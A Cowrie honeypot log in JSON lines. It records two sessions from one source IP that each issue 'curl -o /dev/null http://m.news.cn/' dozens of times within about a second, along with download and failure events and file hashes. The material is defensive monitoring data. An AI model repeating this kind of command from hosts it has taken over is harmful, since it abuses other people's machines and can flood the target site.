{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.858451Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.870376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.871333Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.876932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.878178Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.894284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.905774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.906881Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.914554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.915498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.940542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.941466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.945082Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.952485Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.953398Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.977899Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.978925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.996224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.997187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.019841Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.020864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.040628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.041684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.062562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.063585Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.087745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.088754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.105018Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.105916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.109449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.129171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.130259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.148738Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.150730Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.151579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.167653Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.179519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.180605Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.191150Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.192315Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.198426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.199489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.231192Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.232198Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.234324Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.235564Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.250506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.251594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.267843Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.275496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.276863Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.287932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.288965Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.298039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.299414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.312852Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.337741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.338816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.343799Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.344649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.354553Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.355969Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.380379Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.386883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.387980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.390949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.391822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.393210Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.395288Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.440781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.441962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.444548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.445451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.481820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.483032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.485582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.486568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.510074Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.523000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.524058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.526931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.528069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.557007Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.567993Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.569249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.571543Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.572572Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.577569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.607776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.608724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.611309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.612285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.628247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.651987Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.682691Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.702791Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.732428Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.733695Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.736885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.737731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.740265Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.764960Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.778504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.779647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.782052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.785159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.785961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.810783Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.847824Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.894574Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.896035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.899609Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.900941Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.901996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.912399Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:23.936876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:23.938073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
